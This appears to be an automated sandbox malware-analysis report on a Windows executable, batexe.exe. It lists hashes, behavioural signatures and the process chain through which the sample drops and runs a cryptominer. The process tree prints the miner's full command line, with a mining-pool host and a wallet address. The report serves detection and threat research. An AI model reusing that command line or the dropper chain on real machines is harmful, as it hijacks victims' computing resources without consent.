Analysis
-
max time kernel
294s -
max time network
301s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
13/02/2024, 18:53
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 2140 b2e.exe 216 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 216 cpuminer-sse2.exe 216 cpuminer-sse2.exe 216 cpuminer-sse2.exe 216 cpuminer-sse2.exe 216 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/5052-8-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 5052 wrote to memory of 2140 5052 batexe.exe 85 PID 5052 wrote to memory of 2140 5052 batexe.exe 85 PID 5052 wrote to memory of 2140 5052 batexe.exe 85 PID 2140 wrote to memory of 3380 2140 b2e.exe 86 PID 2140 wrote to memory of 3380 2140 b2e.exe 86 PID 2140 wrote to memory of 3380 2140 b2e.exe 86 PID 3380 wrote to memory of 216 3380 cmd.exe 89 PID 3380 wrote to memory of 216 3380 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Users\Admin\AppData\Local\Temp\6F15.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\6F15.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6F15.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7196.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:216
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.9MB
MD59317cafb85becd9011ca213e7be3a2bc
SHA11c84c389734da0532809700191b96dc61527e382
SHA256644eb7fd5f540a11f942d00b2233e715a40b8548294924fc054db1e08b293090
SHA51265120a9f1410f4b9350788c5898557be3d3b195f03b3425895748764fc052048f38998bb455cef4f25f748c696821a9a4622c8f09f6ae4603dcd6882be451684
-
Filesize
192KB
MD56ac4b534a8945150025756c2f85dd2d4
SHA14f8633cd78b9248d5885e75ff1b26ef27a196ad1
SHA2562e07e008a86c33e31905b1f49b18245261ad08ed3463c6750d63502e1e20e43d
SHA512303f0cd104441235da58583af1597994df43d0a2d55d6245e89fc7d8f2509915525925277636214722e922f2939c93ba95627d54a18105d6cfa8e606b2f3c172
-
Filesize
756KB
MD58ec43dd0d0ee1dc6b96851a2ea228a95
SHA14480ee78a8b5afaf81c15117fe9c5609065a991f
SHA256b7a5a1aae374fce2a6c9c672683baf275d8d5ff30336cca7cfb012f916d116ae
SHA51286e737e22ba8501d4ffda9869cc1628cac23b013df0e3294b998ad52d6327dbc12a6a276194a772af767cc3613e14e0def12d378dc0086e4d7ff0c8720105a6e
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
801KB
MD5ace2c4f42ff7934dc21224835c70611d
SHA1b8c186de1caa7b14fc0627cea2a646f86d71b3b6
SHA256bebf6ebee5915091b17364e01742811f204846adfd04390aa4b125f42d71986d
SHA51200e74c77f0057ed9068115352533d403b9871a0228fc93211ced0fef32ac861f89d88953ac485c95c20e0533462c5a35c9e9c7c9483e9b399c1656e588b28e42
-
Filesize
527KB
MD5a8fc63ec298b9cc5a327cec8e65b8b39
SHA19aab44e63cf387fcb765e83509cb30377e2c1b57
SHA2562d2c84d8b6b004bedf4ad53211bccec3ebe5fdb0006882aa53dceba89810cce1
SHA5126938985615b956b970a2c6f3faa1a35b42bf3b335a4e4ee8722d485f1c95300cb2980489d988115a4ab695fc9477b706bf1d59624a1447696da8c745df88695f
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
410KB
MD52ce4a41e73af5ee6bdbb88528908506f
SHA1b1de38824d9a4af23856ac4815e78baa54594d45
SHA256f4ae166306e007ce61ce0817fd859df5e82f0f2e2fe6d09b90f7f33eae7e6ed5
SHA5124e88b56a9b3f05e886ba06aeef1d70185d31263c710feea438143a5e27901866c3323c9a4890c68d016d15a4020eaebfbcf1813a526b10fd0222061a9caa1f28
-
Filesize
586KB
MD59acc06276b7146d71e3ba5ccf40758a9
SHA1219d615f45752ceea3c49d511d10b51711253831
SHA2566164d4f542270bff67f1e7d44fcda03d4bd7c636115ec45d96d580a4c85c2cdb
SHA512517645a93fc860e3c5a2ca536ae70b885bddf127cc46e0c2a22ce87c59c7823a5fc0e38e2bed3319fbb7e43cccbfda7e715c3075ab3a700227c780ea1f5c010d
-
Filesize
589KB
MD56160608fdd17a96413ae771579679ae1
SHA1ad1b4ba01b10b0b6874cd02dacd122b775a0d53d
SHA256f5cb8c12f36685c51f714792b55e02861f588cf28a6456dc810266148e2286b7
SHA512d3f5da523772ca234ea07374a71e63c57a1f0c87609550d74bd8423c9f264a8f8a202655ae7e2add3639071185b8c9c3e288c3609bc2e931af5226369f28a6a3
-
Filesize
424KB
MD5b685b10fa9ec2a152fc2d7ad47ee149a
SHA17a940f80a0eda5080553533df7d4caf97b280c74
SHA2564b7572114190bb9a0f5f7306a12593681dd10f59e243db0f6282d3ceea5f95f2
SHA5125c9087e06d2a4550151ab4ae1c44ec3a193260af6690a23ea36608a5270d69292e9c9ca1cb781c5d97a19d8bb87a2a815caafa3048f1da7579165b37f362845f
-
Filesize
856KB
MD56b7048d91cef5424867b6acb32b0bf18
SHA1d0feae965358bb03808943ff328077b1f653a35f
SHA25680a5b6d270443b1dea7088050dedb6c789e6a03ff754ddbd144ddf3ca83c5020
SHA512587e5466ba85b9154f7a762400bee864b86c419593fdeecf03b5c234aaa39dca5de6444030473b8281d9f89a2e659438aff2b44e8d880f3f83e16a70e1ccc101
-
Filesize
544KB
MD5266815bd7eadb25e526a41074e8c96e9
SHA17be48c0e0069429b27dc421a802045de086aaf25
SHA256ed6c1637fd05fd0dacd6cf9515184ee9e60c29b71692cc1c0e7f1a5aece43692
SHA51269ce11df3547615b72246e7786ef179d71fb4d6865e9aa5e1b64d606f57381b1316c86beb99c29f4c6b95328a7b464dbc53a3b61a62a9918d8db9eedf0663e69
-
Filesize
274KB
MD59a63366200f93878ef440e5b263d1443
SHA15e00d05efebddb77aa64417b3fc455fdfe5205d8
SHA256655d191667757607a8b92fb859312f6488e4948c76dab6288f2638941ec3c24e
SHA512f5dcd5ee5f5271a87cca9f7e17a81fae65873fef5f34f430dfce5e100ca1d80f3939379e0d8ea8a31f1fb6876cb5e9c5588969a8ccc9ab3beb8659c4e32aa10f
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770